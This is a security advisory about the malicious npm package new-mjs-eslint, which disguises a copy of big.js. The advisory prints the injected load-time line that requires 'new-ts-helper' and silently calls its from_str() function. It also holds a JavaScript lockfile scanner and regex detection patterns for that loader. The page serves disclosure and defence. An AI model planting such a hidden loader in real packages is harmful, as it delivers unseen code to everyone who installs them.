Malicious package

new-mjs-eslint (npm)

Malicious code in new-mjs-eslint (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-6226
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall new-mjs-eslint

What this malware does

The package is published under the unrelated name 'new-mjs-eslint' but ships a verbatim copy of the big.js decimal-arithmetic library (original MikeMcl/big.js header, README, and source). Both main entrypoints, big.js and big.mjs, contain an injected statement at lines 605-606: const helper = require("new-ts-helper"); helper.from_str().then(e => e).catch(e => { });. This fires on every require()/import of the package, loads the sibling dependency new-ts-helper, invokes its from_str() function, and silently swallows any error. Three things mark the code as malicious: the package name does not match its advertised content (eslint-shaped name, big.js content), the injected call sits mid-file rather than at a natural import location, and errors are deliberately suppressed. The entrypoint is a delivery vector for whatever code new-ts-helper ships, executed at load time on any installer that imports the package.
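
One way to check a project for this package and for the injected loader line described above, as an added example that is not part of the original advisory. The names FLAGGED, findFlaggedPackages and hasInjectedLoader are hypothetical, and the sample lockfile and source text are constructed for illustration.

```javascript
// Added example: package names and the flagged version are taken from this advisory.
const FLAGGED = {
  "new-mjs-eslint": ["7.0.6"], // flagged version listed on this page
  "new-ts-helper": null,       // loaded by the injected line; report any version
};

// Walk a parsed package-lock.json (lockfileVersion 1, 2 or 3) and report hits.
function findFlaggedPackages(lock) {
  const hits = [];
  const check = (name, version, where) => {
    if (!Object.prototype.hasOwnProperty.call(FLAGGED, name)) return;
    const versions = FLAGGED[name];
    hits.push({ name, version, where, flaggedVersion: versions === null || versions.includes(version) });
  };
  // v2/v3: flat "packages" map keyed by install path.
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!path) continue; // "" is the root project itself
    const name = meta.name || path.split("node_modules/").pop();
    check(name, meta.version, path);
  }
  // v1: nested "dependencies" tree keyed by package name.
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      check(name, meta.version, trail + name);
      walk(meta.dependencies, trail + name + " > ");
    }
  };
  if (!lock.packages) walk(lock.dependencies, "");
  return hits;
}

// Match the injected loader: a require of new-ts-helper plus a from_str() call.
function hasInjectedLoader(source) {
  return /require\(\s*["']new-ts-helper["']\s*\)/.test(source) &&
         /\.from_str\s*\(/.test(source);
}

// Constructed sample lockfile and source text (not real project data).
const sampleLock = { lockfileVersion: 3, packages: {
  "": { name: "demo-app", version: "1.0.0" },
  "node_modules/big.js": { version: "0.0.0" },
  "node_modules/new-mjs-eslint": { version: "7.0.6" },
  "node_modules/new-mjs-eslint/node_modules/new-ts-helper": { version: "0.0.0" },
} };
const sampleSource = 'const helper = require("new-ts-helper");\nhelper.from_str().then(e => e).catch(e => { });';
console.log(findFlaggedPackages(sampleLock), hasInjectedLoader(sampleSource));
```

To scan a real project, pass the parsed contents of its package-lock.json to findFlaggedPackages and the text of a suspect entrypoint file to hasInjectedLoader.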

Malicious versions

1 flagged
7.0.6

Indicators of compromise (SHA-256)

b4ae24b182a00059424b8ea4800927bbbf662f0e6bf20264af611d37203a3f2e

Frequently asked questions

No. new-mjs-eslint on npm has been identified as a malicious package (version 7.0.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007070

Credits

  • Amazon Inspector · finder

new-mjs-eslint (npm) malicious package — MAL-2026-6226 | O3 Security